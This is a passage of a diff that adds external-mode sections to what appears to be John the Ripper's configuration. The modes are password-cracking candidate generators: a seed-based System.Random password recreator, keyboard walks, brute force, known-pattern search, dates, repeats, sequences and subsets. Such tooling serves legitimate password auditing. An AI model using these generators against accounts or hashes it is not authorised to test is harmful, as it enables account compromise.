+	boundaries_letters[i++] = 247786575; boundaries_letters[i++] = 330382100;
+	boundaries_letters[i++] = 412977625; boundaries_letters[i++] = 495573150;
+	boundaries_letters[i++] = 578168675; boundaries_letters[i++] = 660764200;
+	boundaries_letters[i++] = 743359725; boundaries_letters[i++] = 825955250;
+	boundaries_letters[i++] = 908550775; boundaries_letters[i++] = 991146300;
+	boundaries_letters[i++] = 1073741824; boundaries_letters[i++] = 1156337349;
+	boundaries_letters[i++] = 1238932874; boundaries_letters[i++] = 1321528399;
+	boundaries_letters[i++] = 1404123924; boundaries_letters[i++] = 1486719449;
+	boundaries_letters[i++] = 1569314974; boundaries_letters[i++] = 1651910499;
+	boundaries_letters[i++] = 1734506024; boundaries_letters[i++] = 1817101549;
+	boundaries_letters[i++] = 1899697074; boundaries_letters[i++] = 1982292599;
+	boundaries_letters[i++] = 2064888124; boundaries_letters[i++] = 2147483647;
+
+	i = 0;
+	boundaries_symbols[i++] = 67108864; boundaries_symbols[i++] = 134217728;
+	boundaries_symbols[i++] = 201326592; boundaries_symbols[i++] = 268435456;
+	boundaries_symbols[i++] = 335544320; boundaries_symbols[i++] = 402653184;
+	boundaries_symbols[i++] = 469762048; boundaries_symbols[i++] = 536870912;
+	boundaries_symbols[i++] = 603979776; boundaries_symbols[i++] = 671088640;
+	boundaries_symbols[i++] = 738197504; boundaries_symbols[i++] = 805306368;
+	boundaries_symbols[i++] = 872415232; boundaries_symbols[i++] = 939524096;
+	boundaries_symbols[i++] = 1006632960; boundaries_symbols[i++] = 1073741824;
+	boundaries_symbols[i++] = 1140850688; boundaries_symbols[i++] = 1207959552;
+	boundaries_symbols[i++] = 1275068416; boundaries_symbols[i++] = 1342177280;
+	boundaries_symbols[i++] = 1409286144; boundaries_symbols[i++] = 1476395008;
+	boundaries_symbols[i++] = 1543503872; boundaries_symbols[i++] = 1610612736;
+	boundaries_symbols[i++] = 1677721600; boundaries_symbols[i++] = 1744830464;
+	boundaries_symbols[i++] = 1811939328; boundaries_symbols[i++] = 1879048192;
+	boundaries_symbols[i++] = 1946157056; boundaries_symbols[i++] = 2013265920;
+	boundaries_symbols[i++] = 2080374784; boundaries_symbols[i++] = 2147483647;
+
+	seed = 0;
+}
+
+void generate()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+
+	/* BEGIN System.Random(seed) */
+	if(seed < 0) {
+		/* Only bother with non-negative integers */
+		word = 0;
+		return;
+	}
+
+	s = 161803398 - seed++;
+	seedarray[55] = s;
+	i = val = 1;
+
+	while(i < 55) {
+		bucket = 21 * i % 55;
+		seedarray[bucket] = val;
+		val = s - val;
+		if(val < 0) val += 2147483647;
+		s = seedarray[bucket];
+		i++;
+	}
+
+	i = 1;
+	while(i < 5) {
+		j = 1;
+		while(j < 56) {
+			seedarray[j] -= seedarray[1 + (j + 30) % 55];
+			if(seedarray[j] < 0) seedarray[j] += 2147483647;
+			j++;
+		}
+		i++;
+	}
+	next = 0;
+	nextp = 21;
+	/* END System.Random(seed) */
+
+	used_charsets = 0;
+	while(used_charsets != 15) {
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+
+			j = 0;
+			while(boundaries_charclass[j] < randnum) j++;
+
+			word[i] = j; /* Temporarily store in word[] */
+			used_charsets |= (1 << j);
+			i++;
+		}
+	}
+
+	i = 0;
+	while(i < password_length) {
+		/* BEGIN Random.Sample() */
+		if (++next >= 56) next = 1;
+		if (++nextp >= 56) nextp = 1;
+		randnum = seedarray[next] - seedarray[nextp];
+		if (randnum == 2147483647) randnum--;
+		if (randnum < 0) randnum += 2147483647;
+		seedarray[next] = randnum;
+		/* END Random.Sample() */
+		j = 0;
+
+		if(word[i] == 0) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = lowers[j];
+		} else if (word[i] == 1) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = uppers[j];
+		} else if (word[i] == 2) {
+			while(boundaries_numbers[j] < randnum) j++;
+			word[i++] = numbers[j];
+		} else { /* if (word[i] == 3) */
+			while(boundaries_symbols[j] < randnum) j++;
+			word[i++] = symbols[j];
+		}
+	}
+	word[i] = 0;
+}
+
+
+void restore()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+	int candidate[32]; /* This needs to be at-least as big as password-length */
+
+	seed = 0;
+
+	while(seed > 0) {
+		/* BEGIN System.Random(seed) */
+		s = 161803398 - seed++;
+		seedarray[55] = s;
+		i = val = 1;
+
+		while(i < 55) {
+			bucket = 21 * i % 55;
+			seedarray[bucket] = val;
+			val = s - val;
+			if(val < 0) val += 2147483647;
+			s = seedarray[bucket];
+			i++;
+		}
+
+		i = 1;
+		while(i < 5) {
+			j = 1;
+			while(j < 56) {
+				seedarray[j] -= seedarray[1 + (j + 30) % 55];
+				if(seedarray[j] < 0) seedarray[j] += 2147483647;
+				j++;
+			}
+			i++;
+		}
+		next = 0;
+		nextp = 21;
+		/* END System.Random(seed) */
+
+		used_charsets = 0;
+		while(used_charsets != 15) {
+			i = 0;
+			while(i < password_length) {
+				/* BEGIN Random.Sample() */
+				if (++next >= 56) next = 1;
+				if (++nextp >= 56) nextp = 1;
+				randnum = seedarray[next] - seedarray[nextp];
+				if (randnum == 2147483647) randnum--;
+				if (randnum < 0) randnum += 2147483647;
+				seedarray[next] = randnum;
+				/* END Random.Sample() */
+
+				j = 0;
+				while(boundaries_charclass[j] < randnum) j++;
+
+				candidate[i] = j;
+				used_charsets |= (1 << j);
+				i++;
+			}
+		}
+
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+			j = 0;
+
+			if(candidate[i] == 0) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(lowers[j] != word[i++]) break;
+			} else if (candidate[i] == 1) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(uppers[j] != word[i++]) break;
+			} else if (candidate[i] == 2) {
+				while(boundaries_numbers[j] < randnum) j++;
+				if(numbers[j] != word[i++]) break;
+			} else { /* if (word[i] == 3) */
+				while(boundaries_symbols[j] < randnum) j++;
+				if(symbols[j] != word[i++]) break;
+			}
+		}
+		if(i == password_length) return;
+	}
+}
+
+# Try sequences of adjacent keys on a keyboard as candidate passwords
+[List.External:Keyboard]
+int maxlength, length;	// Maximum password length to try, current length
+int fuzz;		// The desired "fuzz factor", either 0 or 1
+int id[15];		// Current character indices for each position
+int m[0x800];		// The keys matrix
+int mc[0x100];		// Counts of adjacent keys
+int f[0x40], fc;	// Characters for the first position, their count
+
+void init()
+{
+	int minlength;
+	int i, j, c, p;
+	int k[0x40];
+
+	// Initial password length to try
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	fuzz = 1;			// "Fuzz factor", set to 0 for much quicker runs
+
+/*
+ * This defines the keyboard layout, by default for a QWERTY keyboard.
+ */
+	i = 0; while (i < 0x40) k[i++] = 0;
+	k[0] = '`';
+	i = 0; while (++i <= 9) k[i] = '0' + i;
+	k[10] = '0'; k[11] = '-'; k[12] = '=';
+	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
+	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
+	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
+	k[0x1d] = '\\';
+	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
+	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
+	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
+	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
+	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
+	k[0x39] = '.'; k[0x3a] = '/';
+
+	i = 0; while (i < 0x100) mc[i++] = 0;
+	fc = 0;
+
+	/* rows */
+	c = 0;
+	i = 0;
+	while (i < 0x40) {
+		p = c;
+		c = k[i++] & 0xff;
+		if (!c) continue;
+		f[fc++] = c;
+		if (!p) continue;
+		m[(c << 3) + mc[c]++] = p;
+		m[(p << 3) + mc[p]++] = c;
+	}
+	f[fc] = 0;
+
+	/* columns */
+	i = 0;
+	while (i < 0x30) {
+		p = k[i++] & 0xff;
+		if (!p) continue;
+		j = 1 - fuzz;
+		while (j <= 1 + fuzz) {
+			c = k[i + 0x10 - j++] & 0xff;
+			if (!c) continue;
+			m[(c << 3) + mc[c]++] = p;
+			m[(p << 3) + mc[p]++] = c;
+		}
+	}
+
+	length = 0;
+	while (length < minlength)
+		id[length++] = 0;
+}
+
+void generate()
+{
+	int i, p, maxcount;
+
+	word[i = 0] = p = f[id[0]];
+	while (++i < length)
+		word[i] = p = m[(p << 3) + id[i]];
+	word[i--] = 0;
+
+	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	while (++id[i] >= maxcount) {
+		if (!i) {
+			if (length < maxlength) {
+				id[0] = 0;
+				id[length++] = 0;
+			}
+			return;
+		}
+		id[i--] = 0;
+		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	}
+}
+
+void restore()
+{
+	int i;
+
+	/* Calculate the length */
+	length = 0;
+	while (word[length])
+		id[length++] = 0;
+
+	/* Infer the first character index */
+	i = -1;
+	while (++i < fc) {
+		if (f[i] == word[0]) {
+			id[0] = i;
+			break;
+		}
+	}
+
+	/* This sample can be enhanced to infer the rest of the indices here */
+}
+
+# Simplest (fastest?) possible dumb exhaustive search, demonstrating a
+# mode that does not need any special restore() handling.
+# Defaults to printable ASCII.
+[List.External:DumbDumb]
+int maxlength;		// Maximum password length to try
+int startchar, endchar;	// Range of characters (inclusive)
+
+void init()
+{
+	int i;
+
+	startchar = ' ';	// Start with space
+	endchar = '~';		// End with tilde
+
+	// Create first word, honoring --min-len
+	if (!(i = req_minlen))
+		i++;
+	word[i] = 0;
+	while (i--)
+		word[i] = startchar;
+	word[0] = startchar - 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;		// --max-len
+	else
+		maxlength = cipher_limit;	// format's limit
+}
+
+void generate()
+{
+	int i;
+
+	if (++word <= endchar)
+		return;
+
+	i = 0;
+
+	while (word[i] > endchar) {
+		word[i++] = startchar;
+		if (!word[i]) {
+			word[i] = startchar;
+			word[i + 1] = 0;
+		} else
+			word[i]++;
+	}
+
+	if (i >= maxlength)
+		word = 0;
+}
+
+/*
+ * This mode will resume correctly without any restore handing.
+ * The empty function just confirms to John that everything is in order.
+ */
+void restore()
+{
+}
+
+# Generic implementation of "dumb" exhaustive search, given a range of lengths
+# and an arbitrary charset.  This is pre-configured to try 8-bit characters
+# against LM hashes, which is only reasonable to do for very short password
+# half lengths.
+[List.External:DumbForce]
+int maxlength;		// Maximum password length to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x100], c0;	// Character set
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	// Initial password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/*
+ * This defines the character set.
+ *
+ * Let's say, we want to try TAB, all non-control ASCII characters, and all
+ * 8-bit characters, including the 8-bit terminal controls range (as these are
+ * used as regular national characters with some 8-bit encodings), but except
+ * for known terminal controls (risky for the terminal we may be running on).
+ *
+ * Also, let's say our hashes are case-insensitive, so skip lowercase letters
+ * (this is right for LM hashes).
+ */
+	i = 0;
+	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
+	c = ' ';			// start with space (ASCII 32) and
+	while (c < 'a')			// proceed till lowercase 'a'
+		charset[i++] = c++;
+	c = 'z' + 1;			// Skip lowercase letters and
+	while (c <= 0x7e)		// proceed for all printable ASCII
+		charset[i++] = c++;
+	c++;				// Skip DEL (ASCII 127) and
+	while (c < 0x84)		// proceed over 8-bit codes till IND
+		charset[i++] = c++;
+	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
+	charset[i++] = 0x87;
+	c = 0x89;			// Skip HTS (88 hex)
+	while (c < 0x8d)		// Proceed till RI (8D hex)
+		charset[i++] = c++;
+	c = 0x91;			// Skip RI, SS2, SS3, DCS
+	while (c < 0x96)		// Proceed till SPA (96 hex)
+		charset[i++] = c++;
+	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
+	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
+	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Generic implementation of exhaustive search for a partially-known password.
+# This is pre-configured for length 8, lowercase and uppercase letters in the
+# first 4 positions (52 different characters), and digits in the remaining 4
+# positions - however, the corresponding part of init() may be modified to use
+# arbitrary character sets or even fixed characters for each position.
+[List.External:KnownForce]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length, maxlength;
+	int pos, ofs, i, c;
+
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 8;	// Password length to try (NOTE: other [eg. shorter]
+				// lengths will not be tried!)
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/* This defines the character sets for different character positions */
+	if (length > maxlength)
+		length = maxlength;
+	pos = 0;
+	while (pos < 4) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a';
+		while (c <= 'z')
+			charset[ofs + i++] = c++;
+		c = 'A';
+		while (c <= 'Z')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# A variation of KnownForce configured to try likely date and time strings.
+[List.External:DateTime]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length;
+	int pos, ofs, i, c;
+
+	length = 8;	// Must be one of: 4, 5, 7, 8
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < length - 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	if (pos) {
+		ofs = pos++ << 8;
+		charset[ofs] = '/';
+		charset[ofs + 1] = '.';
+		charset[ofs + 2] = ':';
+		charset[ofs + 3] = 0;
+	}
+	while (pos < length - 3) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	ofs = pos++ << 8;
+	charset[ofs] = '/';
+	charset[ofs + 1] = '.';
+	charset[ofs + 2] = ':';
+	charset[ofs + 3] = 0;
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Try strings of repeated characters.
+#
+# This is the code which is common for all [List.External:Repeats*]
+# sections which include this External_base section.
+# The generate() function will limit the maximum length of generated
+# candidates to either the format's limit (maximum password length)
+# or to the limit specified with --stdout=LENGTH (Default: 125),
+# thus avoiding duplicate candidates for formats with limited maximum
+# passwortd length.
+# The comparison of the current length and the limit is only done
+# after switching to a new length.
+# So, if the minimum length specified already exceeds this limit,
+# then all the candidates for the minimum length will be generated
+# nevertheless.
+[List.External_base:Repeats]
+int minlength, maxlength, minc, maxc, length, c;
+
+void generate()
+{
+	int i;
+
+	i = 0;
+	while (i < length)
+		word[i++] = c;
+	word[i] = 0;
+
+	if (c++ < maxc)
+		return;
+
+	c = minc;
+
+	if (++length > maxlength)
+		c = 0; // Will NUL out the next "word" and thus terminate
+}
+
+# Try strings of repeated characters (range: space - 0xff).
+[List.External:Repeats]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = 0x20;
+	maxc = 0xff;
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated digits (range: '0' - '9').
+[List.External:Repeats_digits]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = '0';
+	maxc = '9';
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated lowercase letters (range: 'a' - 'z').
+[List.External:Repeats_lowercase]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = 'a';
+	maxc = 'z';
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated printable ASCII characters
+# (range: ' ' - '~').
+[List.External:Repeats_printable_ASCII]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = ' ';
+	maxc = '~';
+
+	length = minlength; c = minc;
+}
+
+# Try character sequences ("0123456", "acegikmoqs", "ZYXWVU", etc.).
+#
+# The generate() function will limit the maximum length of generated
+# candidates to either the format's limit (maximum password length)
+# or to the limit specified with --stdout=LENGTH (Default: 125),
+# thus avoiding duplicate candidates for formats with limited maximum
+# passwortd length.
+# The comparison of the current length and the limit is only done
+# after switching to a new length.
+# So, if the minimum length specified already exceeds this limit,
+# then all the candidates for the minimum length will be generated
+# nevertheless.
+# External modes reusing this External_base mode should only need to
+# adjust the init() function.
+# In the init() function, a minimum length which is > 1 should be
+# specified.
+# Otherwise, the generated candidates will not depend on the increment
+# specified.
+# For length = 1, the candidates will be the same as for external mode
+# Repeats with length 1.
+# Actually, Repeats is a special case of Sequence, using increment = 0.
+# External modes reusing this External_base mode should also make sure
+# that the number of different characters (specified as a range from "from"
+# to "to") is not smaller than the minimum length ("minlength"),
+# if the start increment "inc" is 1.
+# For a start increment > 1, the number of different characters in the
+# range "from" - "to" must be greater than or equal to
+# (1 + ("minlength" - 1) * "inc").
+# Otherwise you might get unexpected results.
+# The range of characters to be used for the sequences needs to be
+# specified by adjusting the "from" and "to" variables.
+# To generate sequences which decrement characters ("987654"),
+# "from" must be > "to".
+# Otherwise, the generated sequences will increment characters ("abcdef").
+#
+# Variables to be used and the generate() function are common
+# for all sections which include this External_base section.
+[List.External_base:Sequence]
+/*
+ * See the [List.External:Sequence_0-9] section to learn more about
+ * the meaning of these variables which can be adjusted to define
+ * new external modes based on an existing one:
+ */
+int minlength, from, to, maxlength, inc, direction;
+
+/*
+ * The value of these variables shouldn't be changed when copying
+ * an existing external mode:
+ */
+int length, first;
+
+void generate()
+{
+	int i;
+
+	i = 0;
+
+	while (i < length) {
+		word[i] = first + (i * inc * direction);
+		++i;
+	}
+	word[i] = 0;
+
+	// start the next sequence of the same length
+	// with the next character
+	first = first + direction;
+
+	// But check that a sequence of the current length
+	// is still possible (without leaving the range of
+	// characters allowed
+	if ((direction > 0 && first + (length - 1) * inc > to) ||
+	    (direction < 0 && first - (length - 1) * inc < to)) {
+		// No more sequence is possible. Reset start character
+		first = from;
+		// Now try the next length.
+		// But just in case an individual External mode reusing
+		// this External_base mode did specify a maxlength
+		// which is larger than the one supported by the format
+		// or by --stdout=LENGTH, make sure no more candidates
+		// are generated.
+		// Checking this just once per length per increment
+		// doen't really hurt performance.
+		if (maxlength > cipher_limit)
+			maxlength = cipher_limit;
+
+		// For a similar reason, the maximum length of a
+		// sequence is limited by the number of different
+		// characters and by the increment.
+		// The larger the increment, the smaller
+		// the maximum possible length for a given
+		// character range.
+		while (inc  * (maxlength - 1) > direction * (to - from))
+			--maxlength;
+
+		if (++length > maxlength) {
+			// The maximum length for this increment has been reached.
+			// Restart at minimum length with the next possible
+			// increment
+			++inc;
+			// Unfortunately, we have to check again
+			// if the maximum length needs to be reduced
+			// for the new increment
+			while (inc * (maxlength - 1) > direction * (to - from))
+				--maxlength;
+
+			length = minlength;
+		}
+		if (maxlength < minlength)
+			// With the current increment, we can't even generate
+			// sequences of the minimum required length.
+			// So we need to stop here.
+			// This will make sure that no more candidiates
+			//  will be generated:
+			first = 0;
+	}
+}
+
+# Try sequences of digits (range: '0' - '9').
+#
+# Aditional comments can be found in the
+# section [List.External_base:Sequence]
+#
+# This external mode is thoroughly commented,
+# to make it easier to copy and adjust it as needed.
+[List.External:Sequence_0-9]
+.include [List.External_base:Sequence]
+void init()
+{
+	// Adjust the following 4 variables if you want to define
+	// a different external mode.
+
+	// This is the start character for the generated sequence
+	// if "from" is smaller than "to", the increment from
+	// first to second character ... will be positive ("0123456789").
+	// Otherwise, it will be negative ("987654321").
+	from = '0';
+	to = '9';
+
+	// minimum length of the sequence
+	// make sure it is not larger than the number of different characters
+	// in the range between "from" and "to" specified above
+	minlength = 2;
+
+	// start increment for generating the sequence, usually 1
+	// if it is larger than 1, you need even more characters
+	// in the range between "from" and "to"
+	// Don't specify a negative value here.
+	// If you want to generate sequences like "zyxwvu" or "86420",
+	// adjust "from" and "to" so that "from" is larger than "to".
+	// (A start increment of 0 is also possible, in that case the first
+	// sequences will be candidates which just repeat the same character.)
+	inc = 1;
+
+	// For copied external modes, no further changes should be required
+	// in the statements following this comment
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		// We have to create sequences which decrement the previous character
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of lower case letters (range: 'a' - 'z').
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_a-z]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = 'a';
+	to = 'z';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of lower case letters (range: 'a' - 'z'), but reversed
+# ("zxywvu").
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_z-a]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = 'z';
+	to = 'a';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of printable ASCII characters (range: ' ' - '~').
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_printable_ascii]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = ' ';
+	to = '~';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of printable ASCII characters (range: ' ' - '~'),
+# but decrementing characters ("fedcba") instead of incrementing.
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence_reversed_ascii]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = '~';
+	to = ' ';
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+# Try sequence of characters (range: space - 0xff).
+# This external mode is not very well documented.
+# Refer to [List.External:Sequence_0-9] for more detailed information.
+[List.External:Sequence]
+.include [List.External_base:Sequence]
+void init()
+{
+	from = ' ';
+	to = 0xff;
+	minlength = 2;
+	inc = 1;
+
+	length = minlength;
+	first = from;
+
+	if (from <= to) {
+		maxlength = to - from + 1;
+		direction = 1;
+	} else {
+		maxlength = from - to + 1;
+		direction = -1;
+	}
+}
+
+
+# Generate candidate passwords from many small subsets of characters from a
+# much larger full character set.  This will test for passwords containing too
+# few different characters.  As currently implemented, this code will produce
+# some duplicates, although their number is relatively small when the maximum
+# number of different characters (the maxdiff setting) is significantly lower
+# than the maximum length (the maxlength setting).  Nevertheless, you may want
+# to pass the resulting candidate passwords through "unique" if you intend to
+# test them against hashes that are salted and/or of a slow to compute type.
+[List.External:Subsets]
+int minlength;		// Minimum password length to try
+int maxlength;		// Maximum password length to try
+int startdiff;		// Initial number of characters in a subset to try
+int maxdiff;		// Maximum number of characters in a subset to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int subset[0x100], c0;	// Current subset
+int subcount;		// Number of characters in the current subset
+int subid[0x100];	// Indices into charset[] of characters in subset[]
+int charset[0x100];	// Full character set
+int charcount;		// Number of characters in the full charset
+
+void init()
+{
+	int i, c;
+
+	// Minimum password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	// Maximum password length to try, must be at least same as minlength
+	// This external mode's default maximum length can be adjusted
+	// using --max-length= on the command line
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 8;
+
+	// "cipher_limit" is the variable which contains the format's
+	// maximum password length
+	if (maxlength > cipher_limit)
+		maxlength = cipher_limit;
+
+	startdiff = 1;	// Initial number of different characters to try
+	maxdiff = 3;	// Maximum number of different characters to try
+
+/* This defines the character set */
+	i = 0;
+	c = 0x20;
+	while (c <= 0x7e)
+		charset[i++] = c++;
+
+	if (maxdiff > (charcount = i))
+		maxdiff = i;
+	if (maxdiff > maxlength)
+		maxdiff = maxlength;
+
+/*
+ * Initialize the variables such that generate() gets to its "next subset"
+ * code, which will initialize everything for real.
+ */
+	subcount = (i = startdiff) - 1;
